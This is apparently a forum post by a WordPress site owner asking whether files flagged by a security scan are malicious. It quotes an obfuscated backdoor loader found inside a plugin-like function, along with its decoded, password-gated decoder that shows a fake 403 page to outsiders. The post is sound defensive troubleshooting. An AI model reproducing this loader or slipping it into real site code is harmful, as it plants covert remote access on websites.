Just disabled high sensitivity and ran a new scan: the same files were reported.
I’m not sure when I enabled that option, but it certainly wasn’t in the past week or so.
Do you know what these files are? Are the (or were they) core WP files?
Just had a look at the first file – although it looks mostly OK and is commented, there is this in the middle:
function add_registered_taxonomy() {
global $transl_dictionary;
$transl_dictionary = create_function(‘$inp,$key’,”\44\163\151\144\40\75\40\44\137\120 ….. [a long line]
if (!function_exists(“O01100llO”)) {
function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,’fqOf%7bI%26%26fO … [a long line]
The long lines of encoded HTML entities decodes to this:
$sid = $_POST [“sid”]; if (md5($sid) !== ‘0eee3ac0553c3c1376fa2010d8e764f5’ ) return ‘print “<!DOCTYPE HTML PUBLIC \”-//IETF//DTD HTML 2.0//EN\”><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this folder.<HR><ADDRESS>Click here to go to the home page</ADDRESS></BODY></HTML>”;’; $sid= crc32($sid) + $key; $inp = urldecode ($inp); $t = ”; $S =’!#$%&()*+,-./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_\'"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI\'OzU[2&q1{3
h5w_79″4p@6\s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X’; for ($i=0; $i<strlen($inp); $i++){ $c = substr($inp,$i,1); $n = strpos($S,$c,95)-95; $r = abs(fmod($sid+$i,95)); $r = $n-$r; if ($r<0) $r = $r+95; $c = substr($S, $r, 1); $t .= $c; } return $t;
To my untrained eye, this looks dodgy!
Any ideas?